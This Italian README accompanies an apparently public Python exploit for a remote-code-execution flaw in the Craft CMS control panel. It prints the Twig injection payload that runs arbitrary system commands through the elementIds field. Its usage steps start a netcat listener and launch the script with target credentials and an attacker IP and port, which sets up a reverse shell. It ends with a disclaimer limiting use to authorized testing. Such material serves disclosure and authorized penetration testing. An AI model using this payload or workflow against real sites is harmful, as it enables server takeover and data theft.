
Craft CMS RCE tramite condizionali relazionali nel pannello di controllo
Exploit Python per una vulnerabilità RCE nel pannello di amministrazione di Craft CMS, attivata tramite l'endpoint admin/actions/element-indexes/count-elements.
L'iniezione passa attraverso il campo elementIds di una condizione RelatedToConditionRule, che viene interpretata come Twig lato server e sfruttata tramite il filtro system per eseguire un comando arbitrario ({{[['<cmd>']|filter('system')]}}).
Vulnerabilità divulgata da NeoSprings
Versioni interessate :
>= 5.0.0-RC1, <= 5.9.8>= 4.0.0-beta.1, <= 4.17.3Riferimenti :
$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt
$ nc -lvnp <attacker_port>
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>
Questo strumento è fornito solo a scopo didattico e per esercitazioni autorizzate (CTF, penetration testing su contratto o test locali). Utilizzarlo contro qualsiasi sistema senza esplicita autorizzazione è illegale.